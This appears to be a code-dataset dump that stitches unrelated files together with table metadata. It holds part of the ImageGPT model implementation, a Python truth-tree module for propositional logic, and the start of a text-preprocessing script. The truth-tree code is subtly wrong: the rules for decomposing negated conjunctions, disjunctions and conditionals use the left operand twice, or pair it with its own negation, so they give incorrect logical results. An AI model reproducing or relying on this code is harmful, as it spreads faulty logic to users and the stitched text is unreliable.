self.attn = ImageGPTAttention(config, layer_idx=layer_idx)
self.ln_2 = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
if config.add_cross_attention:
self.crossattention = ImageGPTAttention(config, is_cross_attention=True, layer_idx=layer_idx)
self.ln_cross_attn = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = ImageGPTMLP(inner_dim, config)
def forward(
self,
hidden_states: torch.Tensor,
layer_past: Optional[bool] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> tuple:
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
if encoder_hidden_states is not None:
# add one self-attention block for cross-attention
if not hasattr(self, "crossattention"):
raise ValueError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
"cross-attention layers by setting `config.add_cross_attention=True`"
)
residual = hidden_states
hidden_states = self.ln_cross_attn(hidden_states)
cross_attn_outputs = self.crossattention(
hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
attn_output = cross_attn_outputs[0]
# residual connection
hidden_states = residual + attn_output
outputs = outputs + cross_attn_outputs[2:] # add cross attentions if we output attention weights
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
outputs = (hidden_states,) + (outputs if use_cache else outputs[1:])
return outputs # hidden_states, present, (attentions, cross_attentions)
class ImageGPTPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = ImageGPTConfig
load_tf_weights = load_tf_weights_in_imagegpt
base_model_prefix = "transformer"
main_input_name = "input_ids"
supports_gradient_checkpointing = True
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, (nn.Linear, Conv1D)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, ImageGPTLayerNorm):
module.weight.data.fill_(1.0)
# Reinitialize selected weights subject to the OpenAI GPT-2 Paper Scheme:
# > A modified initialization which accounts for the accumulation on the residual path with model depth. Scale
# > the weights of residual layers at initialization by a factor of 1/√N where N is the # of residual layers.
# > -- GPT-2 :: https://openai.com/blog/better-language-models/
#
# Reference (Megatron-LM): https://github.com/NVIDIA/Megatron-LM/blob/main/megatron/model/gpt_model.py
for name, p in module.named_parameters():
if "c_proj" in name and "weight" in name:
# Special Scaled Initialization --> There are 2 Layer Norms per Transformer Block
p.data.normal_(mean=0.0, std=(self.config.initializer_range / math.sqrt(2 * self.config.n_layer)))
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, ImageGPTModel):
module.gradient_checkpointing = value
IMAGEGPT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`ImageGPTConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
IMAGEGPT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
`input_ids_length` = `sequence_length` if `past_key_values` is `None` else
`past_key_values[0][0].shape[-2]` (`sequence_length` of input past key value states). Indices of input
sequence tokens in the vocabulary.
If `past_key_values` is used, only `input_ids` that do not have their past calculated should be passed as
`input_ids`.
Indices can be obtained using [`ImageGPTFeatureExtractor`]. See [`ImageGPTFeatureExtractor.__call__`] for
details.
past_key_values (`Tuple[Tuple[torch.Tensor]]` of length `config.n_layers`):
Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see
`past_key_values` output below). Can be used to speed up sequential decoding. The `input_ids` which have
their past given to this model should not be passed as `input_ids` as they have already been computed.
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
If `past_key_values` is used, optionally only the last `inputs_embeds` have to be input (see
`past_key_values`).
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare ImageGPT Model transformer outputting raw hidden-states without any specific head on top.",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTModel(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = ["attn.masked_bias"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList([ImageGPTBlock(config, layer_idx=i) for i in range(config.num_hidden_layers)])
self.ln_f = ImageGPTLayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
# Model parallel
self.model_parallel = False
self.device_map = None
self.gradient_checkpointing = False
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
"""
for layer, heads in heads_to_prune.items():
self.h[layer].attn.prune_heads(heads)
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=BaseModelOutputWithPastAndCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
`labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100`
are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]`
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTModel.from_pretrained("openai/imagegpt-small")
>>> inputs = feature_extractor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# ImageGPTAttention mask.
if attention_mask is not None:
if batch_size <= 0:
raise ValueError("batch_size has to be defined and > 0")
attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask[:, None, None, :]
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * -10000.0
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.add_cross_attention and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.n_layer)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
# Model parallel
if self.model_parallel:
torch.cuda.set_device(hidden_states.device)
# Ensure layer_past is on same device as hidden_states (might not be correct)
if layer_past is not None:
layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
# Ensure that attention_mask is always on the same device as hidden_states
if attention_mask is not None:
attention_mask = attention_mask.to(hidden_states.device)
if isinstance(head_mask, torch.Tensor):
head_mask = head_mask.to(hidden_states.device)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask[i],
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
# Model Parallel: If it's the last layer for that device, put things on the next device
if self.model_parallel:
for k, v in self.device_map.items():
if i == v[-1] and "cuda:" + str(k) != self.last_device:
hidden_states = hidden_states.to("cuda:" + str(k + 1))
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"""
The ImageGPT Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTForCausalImageModeling(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"attn.masked_bias", r"attn.bias", r"lm_head.weight"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.transformer = ImageGPTModel(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size - 1, bias=False)
# Model parallel
self.model_parallel = False
self.device_map = None
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def prepare_inputs_for_generation(self, input_ids: torch.Tensor, past: Optional[bool] = None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
`labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100`
are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]`
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTForCausalImageModeling
>>> import torch
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTForCausalImageModeling.from_pretrained("openai/imagegpt-small")
>>> device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
>>> model.to(device)
>>> # unconditional generation of 8 images
>>> batch_size = 8
>>> context = torch.full((batch_size, 1), model.config.vocab_size - 1) # initialize with SOS token
>>> context = torch.tensor(context).to(device)
>>> output = model.generate(
... input_ids=context, max_length=model.config.n_positions + 1, temperature=1.0, do_sample=True, top_k=40
... )
>>> clusters = feature_extractor.clusters
>>> n_px = feature_extractor.size
>>> samples = output[:, 1:].cpu().detach().numpy()
>>> samples_img = [
... np.reshape(np.rint(127.5 * (clusters[s] + 1.0)), [n_px, n_px, 3]).astype(np.uint8) for s in samples
... ] # convert color cluster tokens back to pixels
>>> f, axes = plt.subplots(1, batch_size, dpi=300)
>>> for img, ax in zip(samples_img, axes):
... ax.axis("off")
... ax.imshow(img)
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states)
loss = None
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
cross_attentions=transformer_outputs.cross_attentions,
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the `past_key_values` cache if [`~PreTrainedModel.beam_search`] or
[`~PreTrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct
beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
@add_start_docstrings(
"""
The ImageGPT Model transformer with an image classification head on top (linear layer).
[`ImageGPTForImageClassification`] average-pools the hidden states in order to do the classification.
""",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTForImageClassification(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head.weight"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.num_labels = config.num_labels
self.transformer = ImageGPTModel(config)
self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=SequenceClassifierOutputWithPast, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, SequenceClassifierOutputWithPast]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTForImageClassification
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTForImageClassification.from_pretrained("openai/imagegpt-small")
>>> inputs = feature_extractor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> logits = outputs.logits
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
# average-pool the hidden states along the sequence dimension
pooled_hidden_states = hidden_states.mean(dim=1)
# project from (batch_size, hidden_size) to (batch_size, num_labels)
logits = self.score(pooled_hidden_states)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutputWithPast(
loss=loss,
logits=logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
| 44.228359
| 120
| 0.640124
|
4a18c6868ffbc547ca2cf71063f787dff5a9aaaf
| 4,572
|
py
|
Python
|
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class LogicalStatement(ABC):
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
@abstractmethod
def getString(self):
pass
class BinaryStatement(LogicalStatement):
def __init__(self, leftOperand, rightOperand, operator):
self.leftOperand = leftOperand
self.rightOperand = rightOperand
self.operator = operator
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
def getString(self):
return "(" + self.leftOperand.getString() + " " + self.operator + " " + self.rightOperand.getString() + ")"
class UnaryStatement(LogicalStatement):
def __init__(self, operand, operator):
self.operand = operand
self.operator = operator
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
def getString(self):
return self.operator + self.operand.getString()
class Literal(LogicalStatement):
def __init__(self, literal):
self.literal = literal
def evaluate(self, truth_assignment):
return truth_assignment[self.literal]
def getDecomposition(self):
return None
def getString(self):
return self.literal
class Negation(UnaryStatement):
def __init__(self, operand):
UnaryStatement.__init__(self, operand, "¬")
def evaluate(self, truth_assignment):
return not self.operand.evaluate(truth_assignment)
def getDecomposition(self):
if isinstance(self.operand, Literal):
return None
elif isinstance(self.operand, Negation):
return [[self.operand.operand]]
elif isinstance(self.operand, And):
return [[Negation(self.operand.leftOperand)], [Negation(self.operand.leftOperand)]]
elif isinstance(self.operand, Or):
return [[Negation(self.operand.leftOperand), Negation(self.operand.leftOperand)]]
elif isinstance(self.operand, Conditional):
return [[self.operand.leftOperand, Negation(self.operand.leftOperand)]]
elif isinstance(self.operand, Biconditional):
return [[self.operand.leftOperand, Negation(self.operand.rightOperand)], [Negation(self.operand.leftOperand), self.operand.rightOperand]]
class And(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "∧")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) and self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand, self.rightOperand]]
class Or(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "∨")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) or self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand], [self.rightOperand]]
class Conditional(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "→")
def evaluate(self, truth_assignment):
return (not self.leftOperand.evaluate(truth_assignment)) or self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[Negation(self.leftOperand)], [self.rightOperand]]
class Biconditional(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "↔")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) == self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand, self.rightOperand], [Negation(self.leftOperand), Negation(self.rightOperand)]]
if __name__ == "__main__":
A = Literal("A")
B = Literal("B")
C = Literal("C")
l1 = And(A, B)
l2 = Or(B, C)
l3 = Conditional(l1, l2)
l4 = Conditional(Negation(A), Negation(l2))
lFinal = And(l3, l4)
print(lFinal.getString())
truth_assignment = {}
truth_assignment["A"] = False
truth_assignment["B"] = True
truth_assignment["C"] = False
#print(lFinal.evaluate(truth_assignment))
| 32.892086
| 149
| 0.688101
|
4a18c687d677d636843fe67e7e4567d285f6b89f
| 2,737
|
py
|
Python
|
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | 2
|
2020-05-14T16:25:19.000Z
|
2020-06-28T13:53:50.000Z
|
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | null | null | null |
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | null | null | null |
import logging
import multiprocessing
import re
import string
import jieba
from tqdm import tqdm
from zhon.hanzi import punctuation
